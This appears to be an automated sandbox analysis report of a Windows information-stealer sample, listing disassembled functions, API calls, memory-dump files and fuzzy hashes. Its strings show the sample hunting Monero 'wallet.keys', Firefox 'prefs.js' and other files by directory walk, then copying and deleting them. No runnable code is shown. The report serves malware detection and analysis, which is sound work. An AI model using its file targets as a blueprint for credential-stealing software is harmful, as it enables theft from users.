                            • Opcode ID: e6693cbc9cf0506a5bc73ddd3e9a55655313dfb2a1bbde5a88dc98007942040a
                            • Instruction ID: cc199bdf3478cb612f2871b84d5ab6cf11e09251133de7095bb59986b2bb96f4
                            • Opcode Fuzzy Hash: e6693cbc9cf0506a5bc73ddd3e9a55655313dfb2a1bbde5a88dc98007942040a
                            • Instruction Fuzzy Hash: C0525472A002489FCB14FB61DDA6EEE737DAF59300F414599B50A76192EF306B48CF62
                            Function 000E3B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 000E3B1C
                            • FindFirstFileA.KERNEL32(?,?), ref: 000E3B33
                            • lstrcat.KERNEL32(?,?), ref: 000E3B85
                            • StrCmpCA.SHLWAPI(?,000F0F58), ref: 000E3B97
                            • StrCmpCA.SHLWAPI(?,000F0F5C), ref: 000E3BAD
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000E3EB7
                            • FindClose.KERNEL32(000000FF), ref: 000E3ECC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 46b4f6aaf70eb8e8de15265a1cf2f27364dcb4fce760a55963c44149b68cde4d
                            • Instruction ID: d45549ea5f24fbf9a781924e17aaa05cd3869192361f4f95a0e2bd241fb4a8e5
                            • Opcode Fuzzy Hash: 46b4f6aaf70eb8e8de15265a1cf2f27364dcb4fce760a55963c44149b68cde4d
                            • Instruction Fuzzy Hash: 97A14271A002489FDB75DFA5DC89FEE77BCAB49300F044599B60DA6181DB709B84CF61
                            Function 000E4B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 000E4B7C
                            • FindFirstFileA.KERNEL32(?,?), ref: 000E4B93
                            • StrCmpCA.SHLWAPI(?,000F0FC4), ref: 000E4BC1
                            • StrCmpCA.SHLWAPI(?,000F0FC8), ref: 000E4BD7
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000E4DCD
                            • FindClose.KERNEL32(000000FF), ref: 000E4DE2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 46221fd79e1a654b49bab346d9919fc349ea411ff022b6b18244c435db4b4bfd
                            • Instruction ID: 6f9f6f19b6a98444a27265299c51bb881c64cb93e8bf2521f9b8caa00bf0cba9
                            • Opcode Fuzzy Hash: 46221fd79e1a654b49bab346d9919fc349ea411ff022b6b18244c435db4b4bfd
                            • Instruction Fuzzy Hash: 0F613872904219AFCB25EFA0DC85FEA737CBB49701F008598F60996151EF74AB88CF91
                            Function 000E47C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000E47D0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E47D7
                            • wsprintfA.USER32 ref: 000E47F6
                            • FindFirstFileA.KERNEL32(?,?), ref: 000E480D
                            • StrCmpCA.SHLWAPI(?,000F0FAC), ref: 000E483B
                            • StrCmpCA.SHLWAPI(?,000F0FB0), ref: 000E4851
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000E48DB
                            • FindClose.KERNEL32(000000FF), ref: 000E48F0
                            • lstrcat.KERNEL32(?,00D4E918), ref: 000E4915
                            • lstrcat.KERNEL32(?,00D4D720), ref: 000E4928
                            • lstrlen.KERNEL32(?), ref: 000E4935
                            • lstrlen.KERNEL32(?), ref: 000E4946
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 482bdd47a4291f5ee37cdafbf29c35e4f01bd87c86fcd9560aa0883082a84217
                            • Instruction ID: e4cfbddd912c0d9a872933606371100b7c5c1e291b1f5f7f659eea2fe934db40
                            • Opcode Fuzzy Hash: 482bdd47a4291f5ee37cdafbf29c35e4f01bd87c86fcd9560aa0883082a84217
                            • Instruction Fuzzy Hash: 255168B2904218AFCB65EB70DC99FED737CAB59300F404598B609A6191EF74DB84CFA1
                            Function 000E40F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 000E4113
                            • FindFirstFileA.KERNEL32(?,?), ref: 000E412A
                            • StrCmpCA.SHLWAPI(?,000F0F94), ref: 000E4158
                            • StrCmpCA.SHLWAPI(?,000F0F98), ref: 000E416E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000E42BC
                            • FindClose.KERNEL32(000000FF), ref: 000E42D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: a950d77a6d62c1e4c12d07444479cb14cbe89bc6045818337239009cc0ab74c9
                            • Instruction ID: 2324ac039f087bd9fc687d8f91143aea6a5d1c4512a5655ba823c9340ce0453c
                            • Opcode Fuzzy Hash: a950d77a6d62c1e4c12d07444479cb14cbe89bc6045818337239009cc0ab74c9
                            • Instruction Fuzzy Hash: 815168B1904218AFCB25EBB0DC85FEE737CBB59300F4046D9B619A6051DB75AB89CF50
                            Function 000DEE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 000DEE3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 000DEE55
                            • StrCmpCA.SHLWAPI(?,000F1630), ref: 000DEEAB
                            • StrCmpCA.SHLWAPI(?,000F1634), ref: 000DEEC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000DF3AE
                            • FindClose.KERNEL32(000000FF), ref: 000DF3C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: 7c4fc1254c0c50c980c0bb9817e630d43469f50b205a956cc5c1db63580b99a4
                            • Instruction ID: 53fa64adad33f69694afc46e03b6397f32a1d767a7902db033daa582419e549c
                            • Opcode Fuzzy Hash: 7c4fc1254c0c50c980c0bb9817e630d43469f50b205a956cc5c1db63580b99a4
                            • Instruction Fuzzy Hash: 91E10F72A112589EDB64EB61CC62EEE7339AF59300F4145D9B50A72093EF307B89CF61
                            Function 00110098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                            • API String ID: 0-1562099544
                            • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                            • Instruction ID: d3ca227715c0ca34d3c45d74e2ee829a457ab8677a89dd37b783d1c8dee16f0b
                            • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                            • Instruction Fuzzy Hash: BDE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                            Function 000DF7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000F16B0,000F0D97), ref: 000DF81E
                            • StrCmpCA.SHLWAPI(?,000F16B4), ref: 000DF86F
                            • StrCmpCA.SHLWAPI(?,000F16B8), ref: 000DF885
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000DFBB1
                            • FindClose.KERNEL32(000000FF), ref: 000DFBC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: 5facc3b75edafe9cd1bd9540f5e806c969f3377160324e5e88e7f5a73f22f563
                            • Instruction ID: af23126772c1733e7cabc86c449e87ab563b3f98ad31d3b7a7bd9079ffb74a13
                            • Opcode Fuzzy Hash: 5facc3b75edafe9cd1bd9540f5e806c969f3377160324e5e88e7f5a73f22f563
                            • Instruction Fuzzy Hash: 66B13671A002589FCB24FF65DDA5EED7379AF59300F0085A9A50A66153EF306B48CFA2
                            Function 000D1710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000F523C,?,?,?,000F52E4,?,?,00000000,?,00000000), ref: 000D1963
                            • StrCmpCA.SHLWAPI(?,000F538C), ref: 000D19B3
                            • StrCmpCA.SHLWAPI(?,000F5434), ref: 000D19C9
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000D1D80
                            • DeleteFileA.KERNEL32(00000000), ref: 000D1E0A
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000D1E60
                            • FindClose.KERNEL32(000000FF), ref: 000D1E72
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: 2277a8a1b4b352ebdb119591c8feb066a88a8e59e3ca9142d85e9f6786422ea5
                            • Instruction ID: 2b44a6d5751d217fb5a22e136a3affbecaed83375541bcdb60afbf587beed2fa
                            • Opcode Fuzzy Hash: 2277a8a1b4b352ebdb119591c8feb066a88a8e59e3ca9142d85e9f6786422ea5
                            • Instruction Fuzzy Hash: 99121E71E11158AFCB15EB61CCA6AEE7379AF69300F4145D9A10A76093EF307B88CF61
                            Function 000DDF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,000F0C32), ref: 000DDF5E
                            • StrCmpCA.SHLWAPI(?,000F15C0), ref: 000DDFAE
                            • StrCmpCA.SHLWAPI(?,000F15C4), ref: 000DDFC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000DE4E0
                            • FindClose.KERNEL32(000000FF), ref: 000DE4F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 975a15370520c439f3d8ead5239478119a241b41d494a755ed5b8214de0b4895
                            • Instruction ID: 12e182d5327f562d32fd1c2c81e40e50e64e057dfff572f5855876feb098b72c
                            • Opcode Fuzzy Hash: 975a15370520c439f3d8ead5239478119a241b41d494a755ed5b8214de0b4895
                            • Instruction Fuzzy Hash: BFF1CE71A141589ECB25FB61CDA5EEE7379AF29300F4145DAA10A76093EF307B88CF61
